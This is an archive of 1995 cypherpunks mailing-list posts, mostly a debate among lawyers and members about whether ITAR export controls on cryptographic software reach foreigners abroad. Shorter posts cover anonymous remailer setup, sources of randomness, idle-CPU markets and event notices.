In short, in this particular case the ACEA, and by extention the ITAR,
doesn't "say what it says"  it "says what it must mean".  This is an
important way in which legal parsing differs from compiling... 

,,,,,

I'd be interested in hearing more about why you say the ITAR violates
separation of powers: because it gives the executive branch too much power
to define the elements of a criminal offense? 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 02:17:32 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511071753.MAA00375@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> : Where the hell did you get that idea? [that the ITAR applies to
> : foreigners abroad].
> 
> >From Section 120.17 of the ITAR which provides:
> 
>  _Export_ means:
> 
>  . . . .
> 
>  (4) Disclosing (including oral or visual disclosure) or transfering
>  technical data to a foreign person, whether in the United States or
>  abroad . . . .

That can't possibly be considered under U.S. law to apply to
foreigners talking to foreigners abroad, and if you are really a
lawyer you should know that the mere fact that the law doesn't mention
its jurisdiction doesn't make it unlimited. The statutes of New York
State say that I can be prosecuted for running a red light. No where
at all do they say that the red light must be in New York State, but I
suspect that it would be completely impossible for the NY State
attorney general to get any court, in New York State or elsewhere, to
hear a case that I violated New York law by running a light in
Turkmenistan.

> Go read the section that I quoted again.  Where is there an exception
> for foreign persons who happen to be abroad?  

Do you actually call yourself a lawyer?

You appear to be ignorant of the most basic facts of our legal system
-- knowledge that I, as a complete layman, am completely comfortable
with. I wouldn't pretend to be able to practice law, but even I can
smell utterly insane readings of the regulations.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 02:32:33 +0800
To: "William Allen Simpson" <bsimpson@morningstar.com>
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511071803.NAA00410@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"William Allen Simpson" writes:
> As most of us agree that 56-bits is not enough (DES), the 512-bit prime
> seems a waste of time and a tempting target.  I'd like to drop it, but
> Phil is inclined to keep it with a disclaimer.

I agree with your approach, Bill -- it seems worth dropping. Something
this dangerous isn't worth leaving around for people to accidently
use.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 8 Nov 1995 04:56:20 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107120300.21752H-100000@viper.law.miami.edu>
Message-ID: <m0tCtPg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: On Tue, 7 Nov 1995, Peter D. Junger wrote:
: 
: > I quite agree that no one can read the Arms Control Export Act as 
: >authorizing the definition of export in the ITAR that requires, among 
: >other things, that a foreign person get a license that the ACEA says 
: >that he can't get, before discloing cryptographic software to another 
: >foreign person ``in the United States or abroad''. 
: > 
: > The ITAR violates not only the first amendment to the United States 
: > Constitution, it also violates the separation of powers doctrine.  But 
: > it still says what it says.  (And that is why it is unconstitutional.) >
: 
: [Note that this small disagreement between PDJ and me should not obscure 
: our larger areas of agreement...]
: 
: To reiterate my point in legalese:  any court construing the ACEA would
: inevitably read the prohibition on "exporting" to a foreign person as not
: applying where the nation lacks jurisdiction.  This is not even a case of
: applying a construction to save the constitutionality of the statute
: (since it could well take a narrower construction to do that).  It's just
: common sense, which courts actually resort to on occasion. 

I would admit that a court might do this in an effort to hold the
statute constitutional, but a court might also hold the regulations
unconstitutional because they are overbroad.  Remember, the first
amendment is the one area where one has standing to raise facial
constitutonal claims even though one's own constitutional rights are
not infringed.  Consider the case where a foreigner in the United
States discloses to another foreigner, and is then prosecuted.
Couldn't he raise the point in his defense?

(But of course the ITAR as applied to cryptographic software--and that
is all that I am talking about--are so unconstitutional in so many
different ways that nothing is going to turn on that one issue.)

But the real problem--to the extent that there is a real problem--is a
more practical one.  What happens when some foreign person who has set
up a large on-line archive of cryptographic software, in part just to
twit the Americans, tries to immigrate to the United States?  If he is
excluded because he violated the export control laws, is he even going
to get a court hearing?  And if by some miracle he does get a court
hearing, isn't the government going to (i) argue that he was
conspiring with some Americans--which would make him indistinguishable
from Noriega--and (ii) argue that he has to be covered, because one cannot
distinguish his case from that of a foreign person who disclosed
cryptographic software within the United States to another foreign
person.  (Remember, the regulation says ``within the United States or
abroad''?)
 
: In short, in this particular case the ACEA, and by extention the ITAR,
: doesn't "say what it says"  it "says what it must mean".  This is an
: important way in which legal parsing differs from compiling... 
 
: ,,,,,
: 
: I'd be interested in hearing more about why you say the ITAR violates
: separation of powers: because it gives the executive branch too much power
: to define the elements of a criminal offense? 


Not that.  My point most simply is that the AECA does not say what the
ITAR says, and that that is why the language of the ITAR violates the
doctrine of separation of powers.  Your argument--as I understand
it--is that the courts will not construe the ACEA as authorizing the
weird and unconstitutional definitions in the ITAR.  My point is that 
the ACEA doesn't authorize the ITAR and that therefore the ITAR is
unenforceable on separation of powers grounds.

I wrote an article about this twenty-five years ago arguing that the
Pentagon Papers case can best be explained as a separation of powers
case.  In the opinions in that case, Near v. Minnesotta was the most
cited case, but Youngstown Sheet and Tube v. Sawyer came in a close
second.  My conclusion was that when a court is confronted with a hard
constitutional issue, the better part of valor is to decide the case on
separation of powers grounds, if possible.  In Pentagon Papers there was
no congressional authority for the injunction sought; in the case of the
ITAR there is no congressional authority for the definition of export as
it applies to software (as opposed to hardware).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 04:05:36 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511071907.VAA01462@grumble.grondar.za>
Message-ID: <199511071918.OAA05283@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Murray writes:
> Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> non-US or otherwise can buy crypto books - you just can't get the code
> on floppy. Bruce Schneier went through this procedure when he CJ'ed
> "Applied Cryptography".

To my knowledge, Bruce Schneier never CJ'ed "Applied
Cryptography". Phil Karn did that.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer Mansfield-Jones <cardtris@umich.edu>
Date: Wed, 8 Nov 1995 04:40:34 +0800
To: cypherpunks@toad.com
Subject: encrypt-key remailers
Message-ID: <Pine.SOL.3.91.951107143109.23860A-100000@gorf.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello, all -- 

I've a semi-clueless question for the gurus here.  I'm trying to
use the Encrypt-Key option on some of the mixmaster (type I)
cypherpunks remailers, and running into trouble.

Please pardon the level of gory detail here; I'm at a loss to
see what I'm missing, so I present a verbatim record of what I
have tried so far.  Consider the sample remailing directions
below.  The remailer-help documents include very similar
examples.  The single-space indenting is only to indicate where
files are included, and avoid complaints from pgp-aware mail
handlers.

 ::
 Encrypt-Key: apasswd
 Request-Remailing-To: cardtris@umich.edu
 Subject: reply-block-test

 **



The above gets encrypted with flame's public key, yielding a
normal little PGP message.

The block gets 

 ::
 Encrypted: PGP

Prepended onto it, and the result looks like:

 ::
 Encrypted: PGP
 
 -----BEGIN PGP MESSAGE-----
 Version: 2.6.2

 hIwDQyA95PVgp+UBA/4/Vm0EMi2BYBCioaLe35qx1rOxQVGEYoulmwjdDtFsXTup
 L08nyycNVIdxIAW5O+0T4kVuV3/ycAd84SmxDAls9n5Ebc6vP+gwE+dWCaY1TNok
 1Ju08hheCJ2nC0piiN/eT0eR646fMvKGI1CiitBKXPSSkPT6alYlQvLPxd+uV6YA
 AACBvZthKwNEb5DQg/5otGH3njgrJISEyvgEKDZaMFuOUPzxk4IZ4NXm0v2cgHVz
 yxMelKz4WHnOylmZ3WWTFmngukIdasIiFf5avRZ/A4Ff1FRXf7SpxvTfGpA4pYPE
 yjmFhsw/NCnRVqBAH65MiU0USQhPZkZDwLe6spBaJpxENq5C
 =/tbc
 -----END PGP MESSAGE-----
 
 
Trying the above, I find that it does *sort of* work as a reply
block.  If I append sample text and send everything to
remailer@flame.alias.net, I get a reply back that looks like, for
instance: 

Date: Mon, 6 Nov 1995 19:22:13 +0100
From: Anonymous <nobody@flame.alias.net>
To: cardtris@umich.edu
Subject: reply-block-test

**


The appended text, which I expected to come back conventionally
encrypted with 'apasswd', has just vanished into the void.  
Obviously I'm missing something... probably something that seemed 
painfully obvious to the writer of the remailer help file.  If I 
omit the encryption key and '**', I can get reply blocks to work fine,
even chained through multiple remailers.  Suggestions?

   many thanks,

                                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Dept. of Biology                         Jennifer Mansfield-Jones
 University of Michigan                           cardtris@umich.edu
http://www-personal.umich.edu/~cardtris/cardtris.htm
                                             ^---- PGP key available

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ5ueHTZ8yRAewEFAQEewgP/U3OhcBaKSjd1Jpg51UX7NMD3SfrF56WI
fQExYw1lG70GqfEko9T1ft89mDJlj1IvjToR6TJPws8P919Y2qikw333wCt6A9eR
pTMf2Jy1OjKwXRIqlFtrIMky+X2jUYDSMk3H+U1IwT7jjJUfVtzPuSEia0ZzFGmi
U5BLQvrLamQ=
=z1yS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 8 Nov 1995 04:24:27 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCtPg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107143034.22821C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[much trimmed in various places]

On Tue, 7 Nov 1995, Peter D. Junger wrote:

> Michael Froomkin writes:
> : To reiterate my point in legalese:  any court construing the ACEA would
> : inevitably read the prohibition on "exporting" to a foreign person as not
> : applying where the nation lacks jurisdiction.  This is not even a case of
> : applying a construction to save the constitutionality of the statute
> : (since it could well take a narrower construction to do that).  It's just
> : common sense, which courts actually resort to on occasion. 
> I would admit that a court might do this in an effort to hold the
> statute constitutional, but a court might also hold the regulations
> unconstitutional because they are overbroad.  Remember, the first

Technically, this is holding the regulations ultra vires, not 
unconsitutional; the difference matters.

> amendment is the one area where one has standing to raise facial
> constitutonal claims even though one's own constitutional rights are
> not infringed.  Consider the case where a foreigner in the United
> States discloses to another foreigner, and is then prosecuted.
> Couldn't he raise the point in his defense?
>
Note the change in fact pattern: now both foreigners are IN the US where 
indeed they are subject to US law.  My bet: the court has no trouble 
applying the ITAR to these facts and convicting.  I agree this is a 
little silly; but not silly enough to stop it.  [The government will 
argue, and win, as follows: suppose there is no law against murder in 
either of the nations they come from.  Does that mean they can kill each 
other here?]
 
> (But of course the ITAR as applied to cryptographic software--and that
> is all that I am talking about--are so unconstitutional in so many
> different ways that nothing is going to turn on that one issue.)

This issue is now in front of two district judges.

> But the real problem--to the extent that there is a real problem--is a
> more practical one.  What happens when some foreign person who has set
> up a large on-line archive of cryptographic software, in part just to
> twit the Americans, tries to immigrate to the United States?  If he is
> excluded because he violated the export control laws, is he even going
> to get a court hearing?  And if by some miracle he does get a court

Won't need it.  He has committed no offense.  If his petition is turned 
down, he has a right of action.

> hearing, isn't the government going to (i) argue that he was
> conspiring with some Americans--which would make him indistinguishable

Without evidence, they will lose.  Even with evidence, not obvious he has 
done anything wrong.

> from Noriega--and (ii) argue that he has to be covered, because one cannot
> distinguish his case from that of a foreign person who disclosed
> cryptographic software within the United States to another foreign
> person.  (Remember, the regulation says ``within the United States or
> abroad''?)

They lose.  You distinguish it easily ("Now where exactly was the 
defendant at the time, Mr. US Atty?  Germany?  Case dismissed.")

> : I'd be interested in hearing more about why you say the ITAR violates
> : separation of powers: because it gives the executive branch too much power
> : to define the elements of a criminal offense? 
> 
> 
> Not that.  My point most simply is that the AECA does not say what the
> ITAR says, and that that is why the language of the ITAR violates the
> doctrine of separation of powers.  Your argument--as I understand

Ah. Terminological confusion.  That's not a constitutional violation.  
It's an agency misconstruing a statute, renderinig the regulations invalid.
See the Administrative Procedures Act....

> it--is that the courts will not construe the ACEA as authorizing the
> weird and unconstitutional definitions in the ITAR.  My point is that 
> the ACEA doesn't authorize the ITAR and that therefore the ITAR is
> unenforceable on separation of powers grounds.
> 
> I wrote an article about this twenty-five years ago arguing that the
> Pentagon Papers case can best be explained as a separation of powers
> case.  In the opinions in that case, Near v. Minnesotta was the most
> cited case, but Youngstown Sheet and Tube v. Sawyer came in a close
> second.  My conclusion was that when a court is confronted with a hard
> constitutional issue, the better part of valor is to decide the case on
> separation of powers grounds, if possible.  In Pentagon Papers there was

It's too far off topic to pursue any further, but I must take exception 
to the suggestion that we are well served by separation of powers 
intruding into other legal domains.  Bowsher tells us that causation 
principles go out the window in SOP cases.  That alone makes it radioactive.

> no congressional authority for the injunction sought; in the case of the
> ITAR there is no congressional authority for the definition of export as
> it applies to software (as opposed to hardware).


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 8 Nov 1995 05:35:20 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: lp ?
In-Reply-To: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511072043.PAA12012@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Peter D. Junger" writes:
>"Perry E. Metzger" writes:
>
>: 
>: Thaddeus J. Beier writes:
>: > So, if this person was sending cryptographics codes from Switzerland
>: > to Israel, the code would have been imported to the US, then exported
>: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
>: > but it might be something to threaten UUNET with if one of their Northern
>: > Virginia neighbors ever wanted something the couldn't get otherwise.
>: 
>: It isn't clear that telecoms treaties don't implicitly make this legal
>: in spite of the export regulations.
>
>Once again, what the ITAR forbid is the disclosure of cryptographic
>software to a foreign person within or without the United States, so
>it does not make any difference whether the message containing the
>code passes through the United States or not.

OTOH, the ITAR explicitly permits "temporarily imported" munitions to
be re-exported.  Those clauses should entirely eliminate the issue of
whether UUNET could be held liable under ITAR.  ITAR says otherwise --
see section 120.18.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 8 Nov 1995 05:42:03 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: So much for free speech...[noise?]
In-Reply-To: <9511061846.AA21160@hplyot.obspm.fr>
Message-ID: <199511072047.PAA12140@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Laurent Demailly writes:
>"Freedom shall stops where starts the one of the others"
>That's what I learned, and what I think it is a "good thing",
>Thus, your freedom of speach shall stops where it starts hurting
>people
>
>[not that I support at all the childish way l^Hamericans sue everybody
>for anything, but I am happy that racists saying are not allowed and
>can be condamned in France.]

As a child, we all knew the maxim, "Sticks and stones can break my
bones, but names will never hurt me."  Why have we forgotten it as
adults?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oliver Huf <ohuf@relay.sedat.de>
Date: Thu, 9 Nov 1995 13:11:51 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Nov 1995, Peter D. Junger wrote:

> >From Section 120.17 of the ITAR which provides:
> 
>  _Export_ means:
>  . . . .
>  (4) Disclosing (including oral or visual disclosure) or transfering
>  technical data to a foreign person, whether in the United States or
>  abroad . . . .

The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
or persons in the U.S.!

I think it's a common mistake of many Americans that they believe
creating law means creating law for the whole world!


> Go read the section that I quoted again.  Where is there an exception
> for foreign persons who happen to be abroad?  

It's inherent. You simply can't apply US-law to non-US-citizens outside
the U.S.!  


oli.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@carfax.ims.advantis.com>
Date: Wed, 8 Nov 1995 04:52:57 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Video as a source of randomness
In-Reply-To: <95Nov5.095208edt.917@cannon.ecf.toronto.edu>
Message-ID: <Pine.A32.3.91.951107144655.17867B-100000@gandalf.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 5 Nov 1995, SINCLAIR DOUGLAS N wrote:

> The cheapest strong source of video noise that I can think of would be
> a small fan with a ribbon tied to the grille.  As long as it's in a
> turbulent flow regime, you'll get very random numbers at a fast rate.

Oh, I don't know about cheapest.  Electricity costs money.  How does $.32 
per day sound to you?  I've come up with a successful algorithm that 
works like this: I generate a number based upon a random seed.  To get 
the seed, I mail a letter in exactly the same bin at exactly noon 
Monday - Saturday at the US Post Office on Orange Street in New Haven, 
CT.  The letter is always addressed to the exact same recipient.  I simply 
record the number of days it takes for the letter to arrive.  Guaranteed 
random.

===========================================================================
     Henry W. Farkas      |     Me?     Speak for IBM?     Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://www.ims.advantis.com/~hfarkas
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
We'll just outlaw unlicensed cryptography.  After all, it works in France.
You don't see weekly terrorist attacks there any more do you?  - futplex -
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMJ+5WqDthkLkvrK9AQFsgwP/UFHv+skRuUb/2V3QgUHmXcDe/dZfBZaZ
d4A78fuixruhtpCU6dJKcfpUzyWz8Y+iYGll+bFiotJuX2xrSnYji2TbesWsp0AL
XjczoLdG/V2RRQrx57R8Zdq33W6QFb/7j16NdXghLizvxUi5LVk6zRAakMhwa2FM
3+ywY6mgM2I=
=dBcX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: srao@ISI.EDU (Santosh Rao)
Date: Wed, 8 Nov 1995 07:41:25 +0800
To: cypherpunks@toad.com
Subject: Re: idle CPU markets
Message-ID: <199511072315.AA04909@zephyr.isi.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Fri, 27 Oct 1995 06:25:34 -0700
> To: cypherpunks@toad.com
> From: Jay Campbell <edge@got.net>
> Subject: Re: idle CPU markets
> Sender: owner-cypherpunks@toad.com

> A graphic-arts chum of mine is really hyper about cycle sales - it will
> allow him to produce broadcast-quality commercials on a project-by-project
> basis without a huge initial hardware upgrade investment. Is anyone working
> on a Java libarary/demo/whatnot that allows plug-in algorithms, work
> completion 'fetch next batch' code, and some rudimentary authentication
> scheme? If not, I may tinker with this - if so, I'd like to chat :)


At USC/Information Sciences Institute, we are developing a system that will
enable computer owners to sell or barter processor-cycles on the Internet.
This is in some ways similar to what you talk about, in that it allows
the execution of plug-in applications, and the policies for allocation
and deallocation of remote resources are decided by the owners and are 
transparent to the end user. However, unlike Java, our applications are 
compiled C programs that execute on *compute servers* rather than on
client machines. The application could in turn be an interpreter for 
some other language (e.g. Java). We also support parallel applications 
that use the Parallel Virtual Machine (PVM) libraries for interprocess 
communication. 

We have implemented a prototype known as the Prospero Resource Manager 
(PRM); a parallel version of POVRAY raytracing program is one of the 
applications we've run using PRM. We are currently working on integrating 
PRM with authentication and payment products (including kerberos, netcheque
and netcash) developed as part of our other projects on security and 
electronic commerce. If you are interested in further information about 
any of these products, or are interested in participating in any aspect 
PRM's development we'd be happy to talk to you. More information is also 
available on our web pages: http://nii-server.isi.edu/info/prm and
http://nii-server.isi.edu/gost-group.

We also believe that one of the parallel applications for which PRM is 
useful is showing the weakness of certain encryption methods with limited
key size. If anyone has suggestions for algorithms or software that might
be included as a demo application in the next release of PRM, please contact
me.

Santosh Rao.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 8 Nov 1995 05:37:44 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107143034.22821C-100000@viper.law.miami.edu>
Message-ID: <9511072043.AA12971@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> I would admit that a court might do this in an effort to hold the
>> statute constitutional, but a court might also hold the regulations
>> unconstitutional because they are overbroad.  Remember, the first

>Technically, this is holding the regulations ultra vires, not 
>unconsitutional; the difference matters.

I thought Peter was arguing that the separation of powers would be
affected? Surely this would be a constitutional question?

On the strict ultra-vires question and enforcement on non US citizens
may I sugest two hypotheticals?

Hyptotheical A:

I develop a crypoto system in Geneva and pass the source code to my
co-worker. Neither of us have export certificates.

Hypothetical B:

I set up an anonymous FTP site to recieve PGP from abroad. It arrives 
and I hand it over to Fred who has agreed to distribute any material.


It seems to me that in Hypothetical B I am certainly acting in a manner 
which a US court might consider to be something the US government might
seek to prevent. Effectively I would be trafficing. The fact that I only 
hand the goods over to non-US citizens would appear to be irrelevant.

Defining the precise distinction between what is covered and what is 
not is difficult. It is easier to draw the boundaries broadly and let 
the courts decide what is clearly outside the scope. it is not 
necessarily in the governments interests to have sharply defined lines


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 8 Nov 1995 08:07:28 +0800
To: cypherpunks@toad.com
Subject: Re: lp ?
Message-ID: <m0tCxAm-000912C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Peter D. Junger" writes:
>>"Perry E. Metzger" writes:
>>
>>: 
>>: Thaddeus J. Beier writes:
>>: > So, if this person was sending cryptographics codes from Switzerland
>>: > to Israel, the code would have been imported to the US, then exported
>>: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
>>: > but it might be something to threaten UUNET with if one of their Northern
>>: > Virginia neighbors ever wanted something the couldn't get otherwise.
>>: 
>>: It isn't clear that telecoms treaties don't implicitly make this legal
>>: in spite of the export regulations.
>>
>>Once again, what the ITAR forbid is the disclosure of cryptographic
>>software to a foreign person within or without the United States, so
>>it does not make any difference whether the message containing the
>>code passes through the United States or not.
>
>OTOH, the ITAR explicitly permits "temporarily imported" munitions to
>be re-exported.  Those clauses should entirely eliminate the issue of
>whether UUNET could be held liable under ITAR.  ITAR says otherwise --
>see section 120.18.

What if all traffic routed through the US was automatically modified, say,
by inverting all bits, and then de-inverted after it exited the country. (a
software flag would alert the systems to this).  At the time it was
exported, it would not be runnable code, nor compilable source code.

Sure, somebody would claim that "it's easy to turn it into runnable code,
just by XORing the file with ones."  The response is obvious:  Every 100K
file is only a XOR away from every OTHER 100K file.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 8 Nov 1995 06:19:59 +0800
To: hallam@w3.org
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511072043.AA12971@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.951107161844.22821H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 hallam@w3.org wrote:

> >> I would admit that a court might do this in an effort to hold the
> >> statute constitutional, but a court might also hold the regulations
> >> unconstitutional because they are overbroad.  Remember, the first
> 
> >Technically, this is holding the regulations ultra vires, not 
> >unconsitutional; the difference matters.
> 
> I thought Peter was arguing that the separation of powers would be
> affected? Surely this would be a constitutional question?

Yes, that's what he said; I don't agree.

> 
> On the strict ultra-vires question and enforcement on non US citizens
> may I sugest two hypotheticals?
> 
> Hyptotheical A:
> 
> I develop a crypoto system in Geneva and pass the source code to my
> co-worker. Neither of us have export certificates.

No problem if neither of you are US persons (citizen/green card holder)
> 
> Hypothetical B:
> 
> I set up an anonymous FTP site to recieve PGP from abroad. It arrives 
> and I hand it over to Fred who has agreed to distribute any material.

No problem if you and fred are non-US persons abroad.  Big problem if 
Fred is in the US...

> 
> 
> It seems to me that in Hypothetical B I am certainly acting in a manner 
> which a US court might consider to be something the US government might
> seek to prevent. Effectively I would be trafficing. The fact that I only 
> hand the goods over to non-US citizens would appear to be irrelevant.

No, even our government doesn't seek to regulate crypto transfers between 
two foreign persons living outside the US!  (It might attempt to get a 
foreign government to do something, but that's different.)



A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Wed, 8 Nov 1995 08:43:30 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Karl Hess/Schulman Events
Message-ID: <199511080045.QAA27376@chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


Visit Neil's page, http://www.pinsight.com/~zeus/jneil/

Here are places he'll be in Southern California this month
to promote his new book. Contact Neil at jneil@genie.com
for more information.

>                     J. NEIL SCHULMAN APPEARANCES
> 
> --------------------------------------------------------------------
>             [Download Neil's Photo]    [Download Cover]
> 
>                    "SELF CONTROL Not Gun Control"
>                            November, 1995
> 
>           NOVEMBER, 1995 APPEARANCES
> 
>         * Friday Nov. 10, opening until close of show
>           Saturday Nov. 11, opening until 4 PM
>           Sunday Nov. 12, opening until close of show
>           Personal appearance / book autographing!
>           Great Western Gun Show
>           At Fairplex in Pomona, CA
>           Building 6, Table 7048 --
>           next to Threat Management Institute / Peter Alan
>           Kasler
> 
>         * Saturday Nov. 18, afternoon
>           Personal appearance / book autographing!
>           Richard Kyle Books
>           242 East 3rd Street
>           Long Beach, CA 90802
>           Further Info: (310) 432-KYLE
> 
>         * Monday, Nov. 20, 7:00 PM dinner, 8:15 PM program
>           Speech: "SELF CONTROL Not Gun Control"
>           Karl Hess Club
>           Marie Callender's Restaurant 4356 Lincoln Blvd.
>           Marina Del Rey, CA $13.00 includes meeting, buffet
>           dinner with soup, salad bar, meatloaf entree & sides,
>           corn bread, choice of three pies & beverage, tax &
>           tip included. Reservations appreciated at (310)
>           289-4126, 24 hours.
>           EMail for further info to agorist003@aol.com.
> 
> If you would like J. Neil Schulman to make a personal appearance at
> your club meeting or store, Email: jneil@genie.com or Phone/fax:
> 1-500-44-JNEIL (1-500-445-6345). If difficulty connecting, call
> through AT&T 1-800-CALL-ATT then 500-445-6345.
> 
> Return to J. Neil Schulman's Home Page.
> --------------------------------------------------------------------
> HTML by J. Kent Hastings  [Artist]  , zeus@pinsight.com,
> 
> 1354 East Ave. # R-108, Chico, CA 95926. Fax: (916) 893-1525.

Kent
-- 
"Put pages for your business on the World Wide Web, 
just $5 per month!" -- J. Kent Hastings -- 
zeus@pinsight.com -- http://www.pinsight.com/~zeus/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:48:30 +0800
To: cjs@netcom.com (cjs)
Subject: Re: Sign my own certificates?
Message-ID: <v02120d0cacc588e1e690@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Oh jesus, I need to get myself a certificate for the netscape servers
>at work.
>
>All I need are three forms of identification, two written letters, an
>authorized signature, $300, mailed and faxed, along with an e-mail
>or two.
>
>I think this is an amazing pain in the ass.

You forgot about the sperm sample. I wouldn't necessarily consider that
pain, though...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:43:23 +0800
To: cypherpunks@toad.com
